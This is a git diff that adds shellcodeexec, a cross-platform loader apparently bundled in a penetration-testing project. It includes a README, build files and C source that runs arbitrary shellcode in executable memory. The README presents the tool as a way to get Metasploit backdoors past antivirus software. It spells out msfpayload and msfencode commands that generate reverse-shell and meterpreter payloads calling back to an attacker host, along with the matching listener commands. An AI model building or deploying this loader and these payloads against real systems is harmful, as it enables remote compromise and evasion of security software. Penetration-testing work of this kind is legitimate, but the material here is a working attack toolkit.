Develop-Python
diff --git a/‎extra/shellcodeexec/README‎
Lines changed: 126 additions & 0 deletions b/‎extra/shellcodeexec/README‎
Lines changed: 126 additions & 0 deletions
diff --git a/‎extra/shellcodeexec/linux/Makefile‎
Lines changed: 7 additions & 0 deletions b/‎extra/shellcodeexec/linux/Makefile‎
Lines changed: 7 additions & 0 deletions
diff --git a/‎extra/shellcodeexec/linux/shellcodeexec.c‎
Lines changed: 138 additions & 0 deletions b/‎extra/shellcodeexec/linux/shellcodeexec.c‎
Lines changed: 138 additions & 0 deletions
diff --git a/‎extra/shellcodeexec/linux/shellcodeexec.x32‎
3.43 KB b/‎extra/shellcodeexec/linux/shellcodeexec.x32‎
3.43 KB
diff --git a/‎extra/shellcodeexec/linux/shellcodeexec.x64‎
5.04 KB b/‎extra/shellcodeexec/linux/shellcodeexec.x64‎
5.04 KB
diff --git a/‎extra/shellcodeexec/windows/README‎
Lines changed: 25 additions & 0 deletions b/‎extra/shellcodeexec/windows/README‎
Lines changed: 25 additions & 0 deletions
diff --git a/‎extra/shellcodeexec/windows/shellcodeexec.sln‎
Lines changed: 20 additions & 0 deletions b/‎extra/shellcodeexec/windows/shellcodeexec.sln‎
Lines changed: 20 additions & 0 deletions
diff --git a/‎extra/shellcodeexec/windows/shellcodeexec.x32.exe‎
5.5 KB b/‎extra/shellcodeexec/windows/shellcodeexec.x32.exe‎
5.5 KB
@@ -0,0 +1,126 @@
+= Short description =
+
+shellcodeexec is a small script to execute in memory a sequence of opcodes.
+
+
+= Background =
+
+Most of the shellcode launchers out there, including proof of concepts 
+part of many "security" books, detail how to allocate a memory page as
+readable/writable/executable on POSIX systems, copy over your shellcode
+and execute it. This works just fine. However, it is limited to POSIX,
+does not necessarily consider 64-bit architecture and Windows systems.
+
+
+= Description =
+
+This script and the relevant project files (Makefile and Visual Studio
+files) allow you to compile the tool once then run your shellcode across
+different architectures and operating systems.
+
+Moreover, it solves a common real world issue: the target system's anti
+virus software blocking a Metasploit-generated payload stager (either EXE
+of ELF). Take for instance the following command line:
+
+    $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
+
+This generates a Metasploit payload stager, payload.exe, that as soon as
+it lands on the AV-protected target system is recognized as malicious and
+potentially blocked (depending on the on-access scan settings) by many
+anti virus products. At the time of writing this text, 21 out 41 anti
+viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it
+multiple times with msfencode, less AV softwares detect it, still a lot.
+
+I have been surfing the Net and found some interesting tutorials and
+guides about packing, compressing, obfuscating and applying IDA-foo to
+portable executables et similar in order to narrow down the number of AV
+products that can detect it as a malicious file. This is all interesting,
+but does not stop few hard-to-die anti viruses to detect your backdoor.
+
+So the question is, how cool would it be to have a final solution to avoid
+all this hassle? This is exactly where this tool comes into play!
+
+
+= Features =
+
+shellcodeexec:
+
+* Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
+
+* Can be compiled and works on 32-bit and 64-bit architectures.
+
+* As far as I know, no AV detect it as malicious.
+
+* Works in DEP/NX-enabled environments: it allocates the memory page where
+  it stores the shellcode as +rwx - Readable Writable and eXecutable.
+
+* It supports alphanumeric encoded payloads: you can pipe your binary-encoded
+  shellcode (generated for instance with Metasploit's msfpayload) to
+  Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the
+  BufferRegister variable to EAX registry where the address in memory of
+  the shellcode will be stored, to avoid get_pc() binary stub to be
+  prepended to the shellcode.
+
+* Spawns a new thread where the shellcode is executed in a structure
+  exception handler (SEH) so that if you wrap shellcodeexec into your own
+  executable, it avoids the whole process to crash in case of unexpected
+  behaviours.
+
+
+= HowTo =
+
+1. Generate a Metasploit shellcode and encode it with the alphanumeric
+   encoder. For example for a Linux target:
+
+    $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
+
+   Or for a Windows target:
+
+    $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
+
+
+2. Execute the Metasploit multi/handler listener on your machine. For
+   example for a Linux target:
+
+    $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
+
+   Or for a Windows target:
+
+    $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
+
+
+3. Execute the alphanumeric-encoded shellcode with this tool. For example
+   on the Linux target:
+
+    $ ./shellcodeexec <msfencode's alphanumeric-encoded payload>
+
+   Or, on the Windows target:
+
+    C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>
+
+
+= License =
+
+This source code is free software; you can redistribute it and/or
+modify it under the terms of the GNU Lesser General Public
+License as published by the Free Software Foundation; either
+version 2.1 of the License, or (at your option) any later version.
+
+This library is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public
+License along with this library; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+
+
+= Author =
+
+Bernardo Damele A. G. <bernardo.damele@gmail.com>
+
+
+= Homepage =
+
+https://github.com/inquisb/shellcodeexec
@@ -0,0 +1,7 @@
+32:
+	gcc -Wall -Os shellcodeexec.c -o shellcodeexec
+	strip -sx shellcodeexec
+
+64:
+	gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec
+	strip -sx shellcodeexec
@@ -0,0 +1,138 @@
+/*
+	shellcodeexec - Script to execute in memory a sequence of opcodes
+	Copyright (C) 2011  Bernardo Damele A. G.
+	web: http://bernardodamele.blogspot.com
+	email: bernardo.damele@gmail.com
+	
+	This source code is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+#include <sys/types.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <time.h>
+#include <ctype.h>
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+#include <windows.h>
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#else
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#endif
+
+int sys_bineval(char *argv);
+
+int main(int argc, char *argv[])
+{
+	if (argc < 2) {
+		printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
+		exit(-1);
+	}
+
+	sys_bineval(argv[1]);
+
+	exit(0);
+}
+
+int sys_bineval(char *argv)
+{
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	len = (size_t)strlen(argv);
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+	// copy over the shellcode
+	strncpy(code, argv, len);
+
+	// execute it by ASM code defined in exec_payload function
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		return 1;
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);	// align to page boundary
+
+		// mmap an +rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
+
+		if (addr == MAP_FAILED)
+			return 1;
+
+		// copy over the shellcode
+		strncpy((char *)addr, argv, len);
+
+		// execute it
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	return 0;
+}
+
+#if defined(_WIN64)
+void __exec_payload(LPVOID);
+
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__exec_payload(lpParameter);
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+	}
+
+	return 0;
+}
+#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+	}
+
+	return 0;
+}
+#endif
@@ -0,0 +1,25 @@
+Before compiling, an enviroment variable has to be set.
+
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		Directory where the Platform SDK is installed
+
+
+Procedure for setting environment variables on Windows:
+My Computer -> Properties -> Advanced -> Environment Variables
+User variables -> New
+
+
+Sample value:
+--------------------------------------------------------------------------
+Variable name			Variable value
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
+
+
+Notes:
+
+To get as small portable executable as possible compile as follows:
+* Use Visual C++ 2005
+* Strip the executable with UPX
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "shellcodeexec", "shellcodeexec\shellcodeexec.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal